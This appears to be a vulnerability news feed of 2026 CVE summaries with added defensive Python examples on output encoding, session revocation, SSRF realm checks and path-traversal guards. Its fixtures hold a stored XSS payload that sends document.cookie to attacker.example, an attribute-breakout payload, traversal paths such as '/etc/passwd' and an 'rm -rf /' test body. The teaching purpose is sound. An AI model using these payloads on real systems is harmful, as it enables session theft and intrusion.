Latest intel // live feed
CVE-2026-34570 — Ci4-cms-erp Ci4ms: This behavior breaks the intended access control policy and results in persistent unauthorized access.
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to immediately revoke active user sessions when an account is deleted. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions. The system implicitly assumes that authenticated users remain trus[…] CVSSv3.1 8.8 (HIGH)
CVE-2026-34569 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely across public-facing blog category pages, administrative interfaces […]
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog categories. An attacker can inject a malicious JavaScript payload into the category title field, which is then stored server-side. This stored payload is later rendered unsafely across public-facing blog category pag[…] CVSSv3.1 9.9 (CRITICAL)
CVE-2026-34568 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely in multiple application views without proper output […]
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts. An attacker can inject a malicious JavaScript payload into blog post content, which is then stored server-side. This stored payload is later rendered unsafely in multiple application views without proper outpu[…] CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34567 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely when the Categories are viewed via blog […]
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts within the Categories section. An attacker can inject a malicious JavaScript payload into the Categories content, which is then stored server-side. This stored payload is later rendered unsafely when the Catego[…] CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34566 — Ci4-cms-erp Ci4ms: These stored values are later rendered without proper output encoding across administrative page lists
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding acros[…] CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34565 — Ci4-cms-erp Ci4ms: These stored values are later rendered unsafely within administrative dashboards and public-facing navigation menus
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Posts to navigation menus through the Menu Management functionality. Post-related data selected via the Posts section is stored server-side and rendered without proper output encoding. These stored values are later rendered unsafely w[…] CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34564 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely within administrative interfaces and public-facing navigation menus
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Pages to navigation menus through the Menu Management functionality. Page-related data selected via the Pages section is stored server-side and rendered without proper output encoding. This stored payload is later rendered unsafely wi[…] CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34563 — Ci4-cms-erp Ci4ms: An attacker can inject a malicious JavaScript payload into the backup filename via the […]
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via the uploaded xss.sql, whose SQL statements insert the XSS payload server-side when the backup is processed. This stored[…] CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34560 — Ci4-cms-erp Ci4ms: If any stored XSS payload exists within logged data, it is rendered without proper […]
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored wit[…] CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34559 — Ci4-cms-erp Ci4ms: This stored payload is later rendered unsafely across public tag pages and administrative interfaces
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog tags. An attacker can inject a malicious JavaScript payload into the tag name field, which is then stored server-side. This stored payload is later rendered unsafely across public tag pages and administrative interfa[…] CVSSv3.1 9.1 (CRITICAL)
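The CI4MS entries above (CVE-2026-34559 through CVE-2026-34569) share one root cause: values are stored once and then rendered in several views without output encoding. The Python below is an added example, not CI4MS code, showing why the fix belongs at the render step of every view rather than in input sanitization. The category rows, the blocklist and the view functions are constructed for the illustration; row 3 stands in for a value that entered the database through an imported SQL backup (the CVE-2026-34563 route) and therefore never passed the form's validation at all.

```python
import html

# Constructed sample rows standing in for stored blog categories. Row 2 is a
# title submitted through the create/edit form; row 3 stands in for a value
# that entered the table through an imported SQL backup and so never passed
# the form's input validation.
STORED_CATEGORIES = [
    {"id": 1, "title": "Security"},
    {"id": 2, "title": '<script>fetch("//attacker.example/?c=" + document.cookie)</script>'},
    {"id": 3, "title": '" autofocus onfocus="alert(document.domain)'},
]


def input_blocklist(title: str) -> str:
    """The weak control: strip one tag name when the form is submitted.
    It does nothing for payloads that use other tags, attribute breakouts,
    or data that reached the database without going through the form."""
    return title.replace("<script>", "").replace("</script>", "")


def render_category_list_unsafe(rows) -> str:
    """Vulnerable rendering: stored values concatenated straight into HTML."""
    items = "".join(
        f'<li><a href="/blog/category/{r["id"]}">{r["title"]}</a></li>' for r in rows
    )
    return f"<ul>{items}</ul>"


def render_category_list(rows) -> str:
    """Fixed rendering: encode for the HTML text context at the point of output,
    in every view that shows the value, regardless of how it was stored."""
    items = "".join(
        f'<li><a href="/blog/category/{int(r["id"])}">{html.escape(r["title"])}</a></li>'
        for r in rows
    )
    return f"<ul>{items}</ul>"


def render_edit_form_unsafe(row) -> str:
    """Vulnerable admin view: the value lands inside a quoted attribute unencoded,
    so a leading double quote closes the attribute and the rest adds a handler."""
    return f'<input name="title" value="{row["title"]}">'


def render_edit_form(row) -> str:
    """Fixed admin view: html.escape with quote=True (the default) turns " into
    &quot;, so the value cannot terminate the attribute it sits in."""
    return f'<input name="title" value="{html.escape(row["title"], quote=True)}">'


def active_content_leaked(rendered: str) -> bool:
    """Check used below: does the output still contain an unencoded <script tag
    or an attribute breakout carrying an event handler? A detector for the
    demonstration, not a sanitizer."""
    lowered = rendered.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    for name, fn in [("unsafe list", render_category_list_unsafe), ("fixed list", render_category_list)]:
        print(f"{name}: payload active = {active_content_leaked(fn(STORED_CATEGORIES))}")
    blocklisted = {"id": 3, "title": input_blocklist(STORED_CATEGORIES[2]["title"])}
    print("blocklist + unsafe form: payload active =",
          active_content_leaked(render_edit_form_unsafe(blocklisted)))
    print("fixed form: payload active =", active_content_leaked(render_edit_form(blocklisted)))
```

The point the blocklist makes is the one the logs (CVE-2026-34560) and backup (CVE-2026-34563) entries make: a filter at the form has no say over data that arrives by another route, while encoding at render time covers every route. In a real template engine this is the autoescape setting; the check to run against the patched version is that every view listed in the advisories escapes, including the admin lists and the menu builder.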
SightHouse: Automated function identification
Quarkslab released SightHouse, an open-source tool for automated function identification and binary similarity analysis. The tool integrates with IDA Pro, Ghidra, and Binary Ninja to identify known functions across binaries by querying a signature database built on BSIM, and includes an automated pipeline for signature extraction from compiled projects.
CVE-2026-4101 — Ibm Security_verify_access: Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container […]
IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 under certain load conditions could allow an attacker to bypass authentication mechanisms and gain unauthorized access to the application. CVSSv3.1 8.1 (HIGH)
CVE-2026-34873 — Arm Mbed_tls: An issue was discovered in Mbed TLS 3.5.0 through 4.0.0.
An issue was discovered in Mbed TLS 3.5.0 through 4.0.0. Client impersonation can occur while resuming a TLS 1.3 session. CVSSv3.1 9.1 (CRITICAL)
CVE-2026-34528 — Filebrowser Filebrowser: Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via […]
File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default[…] CVSSv3.1 8.1 (HIGH)
CVE-2026-34748 — Payloadcms Payload: Prior to version 3.78.0 in @payloadcms/next, a stored Cross-Site Scripting (XSS) vulnerability existed in […]
Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/next, a stored Cross-Site Scripting (XSS) vulnerability existed in the admin panel. An authenticated user with write access to a collection could save content that, when viewed by another user, would execute in their browser. This issue has been patched in version 3.78.0. CVSSv3.1 8.7 (HIGH)
CVE-2026-34747 — Payloadcms Payload: Prior to version 3.79.1, certain request inputs were not properly validated.
Payload is a free and open source headless content management system. Prior to version 3.79.1, certain request inputs were not properly validated. An attacker could craft requests that influence SQL query execution, potentially exposing or modifying data in collections. This issue has been patched in version 3.79.1. CVSSv3.1 8.5 (HIGH)
CVE-2026-34875 — Arm Mbed_tls: A buffer overflow can occur in public key export for FFDH keys.
An issue was discovered in Mbed TLS through 3.6.5 and TF-PSA-Crypto 1.0.0. A buffer overflow can occur in public key export for FFDH keys. CVSSv3.1 9.8 (CRITICAL)
CVE-2026-34236 — Auth0 Auth0-php: From version 8.0.0 to before version 8.19.0, in applications built with the Auth0 PHP […]
Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. From version 8.0.0 to before version 8.19.0, in applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies. This issue has been patched in version 8.19.0. CVSSv3.1 8.2 (HIGH)
CVE-2026-34159 — Ggml Llama.cpp: Combined with pointer leaks from ALLOC_BUFFER/BUFFER_GET_BASE, this gives full ASLR bypass and remote code […]
llama.cpp is a C/C++ inference engine for several LLM models. Prior to version b8492, the RPC backend's deserialize_tensor() skips all bounds validation when a tensor's buffer field is 0. An unauthenticated attacker can read and write arbitrary process memory via crafted GRAPH_COMPUTE messages. Combined with pointer leaks from ALLOC_BUFFER/BUFFER_GET_BASE, this gives full ASLR bypass and remote code execution. No authentication is required, only TCP access to the RPC server port. Th[…] CVSSv3.1 9.8 (CRITICAL) · EPSS 35th percentile
CVE-2026-34072 — Fccview Cronmaster: Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an […]
Cr*nMaster (cronmaster) is a Cronjob management UI with human readable syntax, live logging and log history for cronjobs. Prior to version 2.2.0, an authentication bypass in middleware allows unauthenticated requests with an invalid session cookie to be treated as authenticated when the middleware’s session-validation fetch fails. This can result in unauthorized access to protected pages and unauthorized execution of privileged Next.js Server Actions. This issue has been patc[…] CVSSv3.1 8.3 (HIGH) · EPSS 27th percentile
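CVE-2026-34570 above (sessions that outlive a deleted CI4MS account) and CVE-2026-34072 (a failed validation fetch treated as success) are two failure modes of the same middleware decision: what a request-time check does when the evidence for "this session is valid" is stale or missing. The Python below is an added example, not code from CI4MS or Cr*nMaster, that puts both vulnerable patterns next to a fixed version which revokes sessions at deletion, re-checks account state on every request and fails closed when the session backend cannot answer. The in-memory stores, cookie names and the SessionStoreUnavailable error are constructed for the example.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional


class SessionStoreUnavailable(Exception):
    """Constructed stand-in for the session-validation backend being unreachable."""


@dataclass
class Account:
    user_id: int
    deleted: bool = False


@dataclass
class Stores:
    accounts: Dict[int, Account] = field(default_factory=dict)
    sessions: Dict[str, int] = field(default_factory=dict)  # cookie value -> user id


def fresh_stores() -> Stores:
    """Constructed fixture: two accounts, each with one live session cookie."""
    return Stores(accounts={1: Account(1), 2: Account(2)},
                  sessions={"sess-alice": 1, "sess-bob": 2})


Validator = Callable[[Stores, str], Optional[int]]


def validate_session(st: Stores, cookie: str) -> Optional[int]:
    """The lookup the middleware performs; None means 'no such session'."""
    return st.sessions.get(cookie)


def validate_session_backend_down(st: Stores, cookie: str) -> Optional[int]:
    """Stand-in for the validation fetch failing (timeout, 5xx, DNS error)."""
    raise SessionStoreUnavailable("session service unreachable")


# --- vulnerable patterns ------------------------------------------------------

def delete_account_login_only(st: Stores, user_id: int) -> None:
    """CVE-2026-34570 pattern: the account is flagged, live sessions are left alone."""
    st.accounts[user_id].deleted = True


def authorize_login_only(st: Stores, cookie: str) -> Optional[int]:
    """CVE-2026-34570 pattern: account state was checked at login, so afterwards a
    cookie that maps to a user id is taken as proof of a valid account."""
    return validate_session(st, cookie)


def authorize_fail_open(st: Stores, cookie: str, validate: Validator) -> bool:
    """CVE-2026-34072 pattern: the flag starts permissive and an exception from the
    validation fetch is swallowed, so the request proceeds as authenticated."""
    allowed = True
    try:
        allowed = validate(st, cookie) is not None
    except SessionStoreUnavailable:
        pass  # error ignored; 'allowed' keeps its initial value
    return allowed


# --- fixed patterns -----------------------------------------------------------

def delete_account(st: Stores, user_id: int) -> None:
    """Revoke every live session for the account as part of the deletion itself."""
    st.accounts[user_id].deleted = True
    for cookie in [c for c, uid in st.sessions.items() if uid == user_id]:
        del st.sessions[cookie]


def authorize_request(st: Stores, cookie: str, validate: Validator) -> Optional[int]:
    """Fail closed when the backend cannot answer, and re-check account state on
    every request so a session that outlived its account is dropped even if the
    revocation in delete_account was missed (e.g. a lagging replica)."""
    try:
        user_id = validate(st, cookie)
    except SessionStoreUnavailable:
        return None  # no answer is not a yes
    if user_id is None:
        return None
    acct = st.accounts.get(user_id)
    if acct is None or acct.deleted:
        st.sessions.pop(cookie, None)  # purge the dangling session
        return None
    return user_id


def scenario() -> dict:
    """Run the vulnerable and the fixed flows and report what each decided."""
    out = {}
    st = fresh_stores()
    delete_account_login_only(st, 1)
    out["login_only_after_delete"] = authorize_login_only(st, "sess-alice")
    out["fail_open_bad_cookie_backend_down"] = authorize_fail_open(st, "not-a-session", validate_session_backend_down)
    out["fail_open_bad_cookie_backend_up"] = authorize_fail_open(st, "not-a-session", validate_session)

    st = fresh_stores()
    delete_account(st, 1)
    out["fixed_after_delete"] = authorize_request(st, "sess-alice", validate_session)
    out["fixed_other_user"] = authorize_request(st, "sess-bob", validate_session)
    out["fixed_backend_down"] = authorize_request(st, "sess-bob", validate_session_backend_down)

    st = fresh_stores()
    st.accounts[1].deleted = True  # deletion recorded but revocation never ran
    out["fixed_stale_session"] = authorize_request(st, "sess-alice", validate_session)
    out["fixed_stale_session_purged"] = "sess-alice" not in st.sessions
    return out


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value!r}")
```

The fixed path deliberately does two things rather than one: revocation at deletion is the primary control, and the per-request account check is the backstop that also catches sessions created before the fix shipped. The fail-closed branch costs availability when the session service is down; that is the intended trade, since the alternative is that an outage of a dependency becomes an authentication bypass.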
CVE-2026-33990 — Docker Model_runner: Prior to version 1.1.25, Docker Model Runner contains an SSRF vulnerability in its OCI […]
Docker Model Runner (DMR) is software used to manage, run, and deploy AI models using Docker. Prior to version 1.1.25, Docker Model Runner contains an SSRF vulnerability in its OCI registry token exchange flow. When pulling a model, Model Runner follows the realm URL from the registry's WWW-Authenticate header without validating the scheme, hostname, or IP range. A malicious OCI registry can set the realm to an internal URL (e.g., http://127.0.0.1:3000/), causing Model Runner[…] CVSSv3.1 9.1 (CRITICAL)
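The defensive shape for this class of SSRF is to vet the realm before following it: the registry is an untrusted party, and the token exchange is the one place in a pull where the client fetches a URL the registry chose. The Python below is an added example, not Docker Model Runner code, and makes no claim about how DMR's 1.1.25 patch validates the URL. It parses a Bearer challenge and accepts the realm only when the scheme is https, the URL carries no credentials, and every address the host maps to is public unicast. The challenge headers, DNS table and host names are constructed for the example.

```python
import ipaddress
import re
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import urlencode, urlsplit

# Constructed challenge headers in the shape a registry returns with a 401 on /v2/.
HONEST_CHALLENGE = (
    'Bearer realm="https://auth.registry.example/token",'
    'service="registry.example",scope="repository:ai/model:pull"'
)
MALICIOUS_CHALLENGE = 'Bearer realm="http://127.0.0.1:3000/",service="registry.example"'

# Constructed DNS answers so the check runs offline. 93.184.216.34 stands in for
# a public address; the second name answers with a public and a private address.
CONSTRUCTED_DNS: Dict[str, list] = {
    "auth.registry.example": ["93.184.216.34"],
    "rebind.attacker.example": ["93.184.216.34", "10.0.0.5"],
}

Resolver = Callable[[str], Iterable[str]]


def constructed_resolver(hostname: str) -> Iterable[str]:
    return CONSTRUCTED_DNS.get(hostname, [])


_PARAM = re.compile(r'(\w+)="([^"]*)"')


def parse_bearer_challenge(header: str) -> Dict[str, str]:
    """Split 'Bearer k="v",k2="v2"' into a dict; raise on any other scheme."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "bearer":
        raise ValueError("not a Bearer challenge")
    return dict(_PARAM.findall(params))


def _is_public(ip: str) -> bool:
    """Global unicast only: rejects loopback, RFC 1918, link-local (169.254/16,
    where cloud metadata services live), shared address space and multicast."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def realm_is_safe(realm: str, resolve: Resolver) -> bool:
    """Accept the realm only if it is https, carries no credentials, and every
    address it points at (literal or resolved) is a public unicast address."""
    u = urlsplit(realm)
    if u.scheme != "https" or not u.hostname or u.username or u.password:
        return False
    try:
        return _is_public(u.hostname)  # literal IP, v4 or bracketed v6
    except ValueError:
        pass  # a hostname: resolve it and vet every answer
    addrs = list(resolve(u.hostname))
    return bool(addrs) and all(_is_public(a) for a in addrs)


def token_endpoint_for(challenge: str, resolve: Resolver) -> Optional[str]:
    """Build the token URL the client may fetch, or None when the realm is unsafe."""
    params = parse_bearer_challenge(challenge)
    realm = params.get("realm", "")
    if not realm_is_safe(realm, resolve):
        return None
    query = {k: v for k, v in params.items() if k in ("service", "scope")}
    return f"{realm}?{urlencode(query)}" if query else realm


if __name__ == "__main__":
    for hdr in (HONEST_CHALLENGE, MALICIOUS_CHALLENGE):
        print(token_endpoint_for(hdr, constructed_resolver))
```

Two caveats apply to any check of this shape. It vets the name at lookup time, so the HTTP client must connect to the vetted address (or re-check the peer address on connect) rather than resolving again, otherwise DNS rebinding reopens the hole; and the token request must not follow redirects to an unvetted host, since a 302 from a public realm to http://127.0.0.1:3000/ would have the same effect as the original bug.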
CVE-2026-33949 — Ssw Tinacms/graphql: Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to […]
Tina is a headless content management system. Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to write and overwrite arbitrary files within the project root. This is achieved by manipulating the relativePath parameter in GraphQL mutations. The impact includes the ability to replace critical server configuration files and potentially execute arbitrary commands by sabotaging build script. This issue has been patched in ver[…] CVSSv3.1 8.1 (HIGH)
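Confining a user-supplied relativePath is a canonicalise-then-compare problem: resolve every `..` and symlink first, then check the result against the directory that is actually allowed. The Python below is an added example, not @tinacms/graphql code; it confines writes to a content subdirectory (an assumed layout) and to document file types, so that even an in-bounds path cannot reach configuration or build scripts at the project root, which is the escalation the advisory describes. The temporary project tree and the paths tried are constructed for the example.

```python
import os
import tempfile

ALLOWED_SUFFIXES = {".md", ".mdx", ".json"}  # assumed: the document types the CMS writes


def resolve_within(root: str, relative_path: str) -> str:
    """Return the canonical absolute path for relative_path if, after resolving
    every '..' and symlink, it still lies under root; otherwise raise ValueError."""
    if not relative_path or "\x00" in relative_path or os.path.isabs(relative_path):
        raise ValueError(f"rejected path {relative_path!r}: must be a non-empty relative path")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, relative_path))
    # commonpath, not startswith: '/srv/content_old' must not pass as '/srv/content'
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError(f"rejected path {relative_path!r}: escapes {root_real}")
    return candidate


def write_content_file(project_root: str, relative_path: str, body: str) -> str:
    """Write a content document. Writes are confined to <project_root>/content
    (assumed layout) and to document types, so configuration files and build
    scripts at the project root are out of reach even for an in-bounds path."""
    content_root = os.path.join(os.path.realpath(project_root), "content")
    target = resolve_within(content_root, relative_path)
    if os.path.splitext(target)[1].lower() not in ALLOWED_SUFFIXES:
        raise ValueError(f"rejected path {relative_path!r}: not a content document")
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "w", encoding="utf-8") as fh:
        fh.write(body)
    return target


def _rejected(fn, *args) -> bool:
    try:
        fn(*args)
    except ValueError:
        return True
    return False


def scenario() -> dict:
    """Exercise the guard against a constructed project tree in a temp directory."""
    out = {}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "content", "posts"))
        # a symlink inside the content tree that points back at the project root
        os.symlink(root, os.path.join(root, "content", "escape"))

        written = write_content_file(root, "posts/hello.md", "# hello\n")
        out["normal_write_inside_content"] = os.path.isfile(written) and written.startswith(
            os.path.join(os.path.realpath(root), "content", "posts")
        )
        out["dotdot_rejected"] = _rejected(write_content_file, root, "../package.json", "{}")
        out["absolute_rejected"] = _rejected(write_content_file, root, "/etc/passwd", "x")
        out["symlink_escape_rejected"] = _rejected(write_content_file, root, "escape/package.json", "{}")
        out["sibling_prefix_rejected"] = _rejected(
            resolve_within, os.path.join(root, "content"), "../content_old/x.md"
        )
        out["script_suffix_rejected"] = _rejected(write_content_file, root, "posts/build.sh", "rm -rf /")
        out["project_root_untouched"] = not os.path.exists(os.path.join(root, "package.json"))
    return out


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value}")
```

Two caveats. On POSIX, os.path.isabs does not treat `C:\...` or `\\server\share` as absolute, so a service that can run on Windows also has to reject drive letters and UNC prefixes explicitly. And the check is only as good as its placement: it must run on the exact path handed to the write call, not on a copy that is later re-joined with user input.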
CVE-2026-30643 — Dedecms Dedecms: An issue was discovered in DedeCMS 5.7.118 allowing attackers to execute code via crafted […]
An issue was discovered in DedeCMS 5.7.118 allowing attackers to execute code via crafted setup tag values in a module upload. CVSSv3.1 9.8 (CRITICAL)
CVE-2026-20160 — Cisco Smart_software_manager_on-prem: A vulnerability in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated […]
A vulnerability in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected SSM On-Prem host. This vulnerability is due to the unintentional exposure of an internal service. An attacker could exploit this vulnerability by sending a crafted request to the API of the exposed service. A successful exploit could allow the attacker to execute commands o[…] CVSSv3.1 9.8 (CRITICAL) · EPSS 56th percentile
CVE-2026-20155 — Cisco Evolved_programmable_network_manager: A vulnerability in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM) […]
A vulnerability in the web-based management interface of Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker with low privileges to access sensitive information that they are not authorized to access. This vulnerability is due to improper authorization checks on a REST API endpoint of an affected device. An attacker could exploit this vulnerability by querying the affected endpoint. A successful exploit could allow the attac[…] CVSSv3.1 8.0 (HIGH) · EPSS 19th percentile